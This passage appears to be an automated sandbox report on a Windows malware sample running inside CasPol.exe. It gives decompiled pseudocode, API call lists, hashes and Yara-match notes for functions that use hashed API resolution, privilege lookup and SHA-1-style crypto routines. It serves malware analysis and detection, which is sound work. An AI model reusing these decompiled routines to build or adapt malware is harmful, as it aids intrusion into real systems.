				_t19 = _a4;
				_t13 = E0040CF63(_t32, _a4 + 0x20,  &_v68); // executed
				_t15 = E004195B3(_a4 + 0x20, _t13, 0, 0, E00402E53(0x90cb65ce));
				_t27 = _t15;
				if(_t27 != 0) {
					_t25 = _a8;
					_t15 = PostThreadMessageW(_t25, 0x111, 0, 0); // executed
					if(_t15 == 0) {
						return  *_t27(_t25, 0x8003, _t28 + (E0040C633(1, 8, _t19 + 0x76c) & 0x000000ff) - 0x40, _t15);
					}
				}
				return _t15;
			}











                                                                                                                                                                                                                                                                                                                            0x004098e3
                                                                                                                                                                                                                                                                                                                            0x004098f4
                                                                                                                                                                                                                                                                                                                            0x004098f8
                                                                                                                                                                                                                                                                                                                            0x00409903
                                                                                                                                                                                                                                                                                                                            0x00409908
                                                                                                                                                                                                                                                                                                                            0x00409913
                                                                                                                                                                                                                                                                                                                            0x0040992b
                                                                                                                                                                                                                                                                                                                            0x00409930
                                                                                                                                                                                                                                                                                                                            0x00409937
                                                                                                                                                                                                                                                                                                                            0x00409939
                                                                                                                                                                                                                                                                                                                            0x00409946
                                                                                                                                                                                                                                                                                                                            0x0040994a
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x0040996e
                                                                                                                                                                                                                                                                                                                            0x0040994a
                                                                                                                                                                                                                                                                                                                            0x00409976

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • PostThreadMessageW.USER32(0000CC46,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409946
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1836367815-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 2515ffc4a8433256958309c25ddaf1653671ec11ea0cbc47fcd5b21ad2bb6768
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 2d8687f109e0ffa181acc9ca0b32257cecb9af4e939f6e85864966571f5bb18d
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2515ffc4a8433256958309c25ddaf1653671ec11ea0cbc47fcd5b21ad2bb6768
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C019B71A4021476E7216691DC82FFF776C9B44F54F14012DFF057A2C2D6ACAD0647E9
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 0041E843 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                                            control_flow_graph 135 41e843-41e874 call 41f1e3 RtlAllocateHeap
                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                                            			E0041E843(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;

				_t3 = _a4 + 0xa9c; // 0xa9c
				E0041F1E3( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                                                                                                                                                                                                                                                                                            0x0041e852
                                                                                                                                                                                                                                                                                                                            0x0041e85a
                                                                                                                                                                                                                                                                                                                            0x0041e870
                                                                                                                                                                                                                                                                                                                            0x0041e874

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00418C69,?,00419410,00419410,?,00418C69,00000000,?,?,?,?,00000000,00000000,00000002), ref: 0041E870
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                                                                                                                                                                                                                                                                            • Instruction ID: a5ada8523d69dc06aed859862b2fcb1f70b55fcd9bee19eb83eda75f01fde0a3
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0E012B2200208ABCB14EF89DC45EA73BACAF88664F018059BA085B242C630F914CAB1
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 004100C3 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                                            control_flow_graph 130 4100c3-4100e7 call 4195b3 133 4100e9-4100ea 130->133 134 4100eb-4100fc GetUserGeoID 130->134
                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 37%
                                                                                                                                                                                                                                                                                                                            			E004100C3(intOrPtr _a4) {
				intOrPtr* _t7;
				void* _t8;

				_t7 = E004195B3(_a4 + 0x20,  *((intOrPtr*)(_a4 + 0x9cc)), 0, 0, 0x998e91b2);
				if(_t7 != 0) {
					_t8 =  *_t7(0x10); // executed
					return 0 | _t8 == 0x000000f1;
				} else {
					return _t7;
				}
			}





                                                                                                                                                                                                                                                                                                                            0x004100dd
                                                                                                                                                                                                                                                                                                                            0x004100e7
                                                                                                                                                                                                                                                                                                                            0x004100ed
                                                                                                                                                                                                                                                                                                                            0x004100fc
                                                                                                                                                                                                                                                                                                                            0x004100ea
                                                                                                                                                                                                                                                                                                                            0x004100ea
                                                                                                                                                                                                                                                                                                                            0x004100ea

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetUserGeoID.KERNELBASE(00000010), ref: 004100ED
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: User
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 765557111-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 2a2f4bf2d1b5abfca1b0b9b1d707145b6cc185a4d9725ba336fd9684e65462f9
                                                                                                                                                                                                                                                                                                                            • Instruction ID: d3a3e2032565f6d34a55456b5a80270182852c25dcf9d34bac0e0dafc7ea0ddc
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a2f4bf2d1b5abfca1b0b9b1d707145b6cc185a4d9725ba336fd9684e65462f9
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 62E0C27378030467FA2091A59C42FBA364F5B84B00F048475F90CE62C2D5A8E8C00028
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 0041E883 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                                            control_flow_graph 138 41e883-41e8b4 call 41f1e3 RtlFreeHeap
                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                                            			E0041E883(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;

				_t3 = _a4 + 0xaa0; // 0xaa0
				E0041F1E3( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                                                                                                                                                                                                                                                                                            0x0041e892
                                                                                                                                                                                                                                                                                                                            0x0041e89a
                                                                                                                                                                                                                                                                                                                            0x0041e8b0
                                                                                                                                                                                                                                                                                                                            0x0041e8b4

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,7BE2EBFA,00000000,?), ref: 0041E8B0
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: FreeHeap
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 6d67904cf882d6269ddcbd82a13a5946b1ec36ad0a690608dd986dc7147b56d6
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 78E012B1200208ABCB14EF89DC49EA73BACAF88754F018059BA095B282C630E914CAB1
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 0041E9E3 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                                            control_flow_graph 141 41e9e3-41ea17 call 41f1e3 LookupPrivilegeValueW
                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                                            			E0041E9E3(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;

				E0041F1E3( *((intOrPtr*)(_a4 + 0x188)), _a4, _t7 + 0xab8,  *((intOrPtr*)(_a4 + 0x188)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                                                                                                                                                                                                                                                                                            0x0041e9fd
                                                                                                                                                                                                                                                                                                                            0x0041ea13
                                                                                                                                                                                                                                                                                                                            0x0041ea17

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FF15,0040FF15,?,00000000,?,?), ref: 0041EA13
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: LookupPrivilegeValue
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3899507212-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 883eed9231432d7abd4647319f9e2ca2356991150de218673098fd41ff504713
                                                                                                                                                                                                                                                                                                                            • Instruction ID: bfff922efd5546c2498e8f0e4afec5ead5688315e9c255b8cfa39456be0dc0f6
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 883eed9231432d7abd4647319f9e2ca2356991150de218673098fd41ff504713
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 82E01AB1600204BBCB10DF49CC45EE737ADAF88754F018065BA0857242CA34E954CBB5
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 0041E8C3 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                                            control_flow_graph 147 41e8c3-41e8ef call 41f1e3 ExitProcess
                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                                            			E0041E8C3(intOrPtr _a4, int _a8) {

				_t5 = _a4;
				E0041F1E3( *((intOrPtr*)(_a4 + 0x9c4)), _t5, _t5 + 0xaa8,  *((intOrPtr*)(_a4 + 0x9c4)), 0, 0x36);
				ExitProcess(_a8);
			}



                                                                                                                                                                                                                                                                                                                            0x0041e8c6
                                                                                                                                                                                                                                                                                                                            0x0041e8dd
                                                                                                                                                                                                                                                                                                                            0x0041e8eb

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E8EB
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ExitProcess
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: b57ab8905769667022f9d87002664c648bec490500c8077294a83f40c0d1d79a
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 1eef75cd45acef3d8dc9b866566625b9bc1116966f0d82bcbc1db343c5ff2bbc
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b57ab8905769667022f9d87002664c648bec490500c8077294a83f40c0d1d79a
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 00D01271B012147BD620DB99CC45FD7779CDF45694F0140A5BA4C5B282C574BA00C7E1
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 0126967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                                            control_flow_graph 150 126967a-126967f 151 1269681-1269688 150->151 152 126968f-1269696 LdrInitializeThunk 150->152
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449784207.0000000001200000.00000040.00001000.00020000.00000000.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_1200000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: da91000bc847c2754bdb9f96ee4c25b57223099274395166b7c911a34fafda46
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 0bda0cf26f0e7f42fe81bc422289fa0214a8eaeb0ca1a60e88697ced3ceee5c6
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: da91000bc847c2754bdb9f96ee4c25b57223099274395166b7c911a34fafda46
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4AB09B719115C5CDEA11D7B4470871779047BD0745F16C055D2020645B4778C4D1F6B5
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                                                                                                            Function 004017E8 Relevance: 2.7, Strings: 2, Instructions: 181COMMONCrypto
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 28%
                                                                                                                                                                                                                                                                                                                            			E004017E8(signed int* __eax, signed int __edi, void* _a8, void* _a12, void* _a16) {
				void* _v0;
				void* _v4;
				void* _v31;
				void* _v33;
				void* _v50;
				void* _v52;
				void* _v56;
				void* _v60;
				signed int* _t101;
				signed int _t159;

				_t101 = __eax;
				_t159 = __edi |  *__eax;
				asm("wait");
				asm("loope 0x30");
				asm("cdq");
				_push(__eax);
				if (_t159 > 0) goto L6;
			}













                                                                                                                                                                                                                                                                                                                            0x004017e8
                                                                                                                                                                                                                                                                                                                            0x004017e8
                                                                                                                                                                                                                                                                                                                            0x004017ea
                                                                                                                                                                                                                                                                                                                            0x004017eb
                                                                                                                                                                                                                                                                                                                            0x004017ed
                                                                                                                                                                                                                                                                                                                            0x004017ee
                                                                                                                                                                                                                                                                                                                            0x004017ef

                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID: :$iiir
                                                                                                                                                                                                                                                                                                                            • API String ID: 0-729711732
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 88acf25604aca0846400fcb5dd9da8a5bde09d6b53cda05089879cfe50d5051d
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 3396d3952a082c7a223aa057ec80b2e371b309597ed4362a2d76cc37b3280a2b
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 88acf25604aca0846400fcb5dd9da8a5bde09d6b53cda05089879cfe50d5051d
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2710231905B858BCB12DF78C4902EBFBF1FF5A300F14869ED4A96B352DA34A645CB64
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 004017F0 Relevance: 2.7, Strings: 2, Instructions: 174COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID: :$iiir
                                                                                                                                                                                                                                                                                                                            • API String ID: 0-729711732
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 29b69e3d5a72d39eee183096013ae9581a1259f9bb9298d0c0cb325f26b6e904
                                                                                                                                                                                                                                                                                                                            • Instruction ID: f51f8778a33b7e77007c94bd14de880356edb4a6b3e4ad39a8436ba3b7a115d8
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 29b69e3d5a72d39eee183096013ae9581a1259f9bb9298d0c0cb325f26b6e904
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD711231905B858BCB12DF78C4D02EBFBF1EF5A300F14869ED4A96B352DA30A645CB64
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 0040BFCD Relevance: 1.7, Strings: 1, Instructions: 434COMMONCrypto
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                                                                                                                                                                                            			E0040BFCD(void* __ebx, signed int __ecx, intOrPtr* _a4) {
				intOrPtr* _t11;

				 *__ecx =  *__ecx << __ecx;
				asm("a16 inc esp");
				asm("jecxz 0x57");
				_t11 = _a4;
				 *((intOrPtr*)(_t11 + 0x14)) = 0;
				 *((intOrPtr*)(_t11 + 0x18)) = 0;
				 *((intOrPtr*)(_t11 + 0x5c)) = 0;
				 *_t11 = 0x67452301;
				 *((intOrPtr*)(_t11 + 4)) = 0xefcdab89;
				 *((intOrPtr*)(_t11 + 8)) = 0x98badcfe;
				 *((intOrPtr*)(_t11 + 0xc)) = 0x10325476;
				 *((intOrPtr*)(_t11 + 0x10)) = 0xc3d2e1f0;
				 *((intOrPtr*)(_t11 + 0x60)) = 0;
				 *((intOrPtr*)(_t11 + 0x64)) = 0;
				return _t11;
			}




                                                                                                                                                                                                                                                                                                                            0x0040bfce
                                                                                                                                                                                                                                                                                                                            0x0040bfd0
                                                                                                                                                                                                                                                                                                                            0x0040bfd2
                                                                                                                                                                                                                                                                                                                            0x0040bfd6
                                                                                                                                                                                                                                                                                                                            0x0040bfdb
                                                                                                                                                                                                                                                                                                                            0x0040bfde
                                                                                                                                                                                                                                                                                                                            0x0040bfe1
                                                                                                                                                                                                                                                                                                                            0x0040bfe4
                                                                                                                                                                                                                                                                                                                            0x0040bfea
                                                                                                                                                                                                                                                                                                                            0x0040bff1
                                                                                                                                                                                                                                                                                                                            0x0040bff8
                                                                                                                                                                                                                                                                                                                            0x0040bfff
                                                                                                                                                                                                                                                                                                                            0x0040c006
                                                                                                                                                                                                                                                                                                                            0x0040c009
                                                                                                                                                                                                                                                                                                                            0x0040c00d

                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID: (
                                                                                                                                                                                                                                                                                                                            • API String ID: 0-3887548279
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 8329d3fb9b310a53a2db63c5301b3a5c9192196cddf8160de6c93bd88fe4f281
                                                                                                                                                                                                                                                                                                                            • Instruction ID: a037bdefaf10244a363f5f63dfa809eb7c7e88f60f9bd7ab9ff1c28a34be79cb
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8329d3fb9b310a53a2db63c5301b3a5c9192196cddf8160de6c93bd88fe4f281
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A8120CB6E006189FDB14CF9AD48059DFBF2FF88314F1AC1AAD849A7315D774AA418F80
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 0040C013 Relevance: 1.7, Strings: 1, Instructions: 423COMMONCrypto
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 73%
                                                                                                                                                                                                                                                                                                                            			E0040C013(signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed char* _t277;
				signed int* _t278;
				signed int _t279;
				signed int _t285;
				signed int _t288;
				signed int _t292;
				signed int _t295;
				signed int _t299;
				signed int _t303;
				signed int _t305;
				signed int _t311;
				signed int _t318;
				signed int _t320;
				signed int _t323;
				signed int _t325;
				signed int _t334;
				signed int _t340;
				signed int _t341;
				signed int _t346;
				signed int _t353;
				signed int _t357;
				signed int _t358;
				signed int _t362;
				signed int _t365;
				signed int _t369;
				signed int _t370;
				signed int _t399;
				signed int _t404;
				signed int _t410;
				signed int _t413;
				signed int _t420;
				signed int _t423;
				signed int _t432;
				signed int _t434;
				signed int _t437;
				signed int _t445;
				signed int _t459;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t470;
				signed int _t478;
				signed int _t479;
				signed int* _t480;
				signed int* _t481;
				signed int _t488;
				signed int _t491;
				signed int _t496;
				signed int _t499;
				signed int _t502;
				signed int _t505;
				signed int _t506;
				signed int _t510;
				signed int _t522;
				signed int _t525;
				signed int _t532;
				void* _t536;

				_t481 = _a4;
				_t353 = 0;
				_t2 =  &(_t481[7]); // 0x45
				_t277 = _t2;
				do {
					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
					_t353 = _t353 + 4;
					_t277 =  &(_t277[0x10]);
				} while (_t353 < 0x10);
				_t278 =  &_v304;
				_v8 = 0x10;
				do {
					_t399 =  *(_t278 - 0x18);
					_t459 =  *(_t278 - 0x14);
					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
					_t278[8] = _t357;
					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
					_t278 =  &(_t278[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t46 =  &_v8;
					 *_t46 = _v8 - 1;
					_t278[6] = _t318 ^ _t399;
					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
				} while ( *_t46 != 0);
				_t320 =  *_t481;
				_t279 = _t481[1];
				_t358 = _t481[2];
				_t404 = _t481[3];
				_v12 = _t320;
				_v16 = _t481[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t462 = _v8;
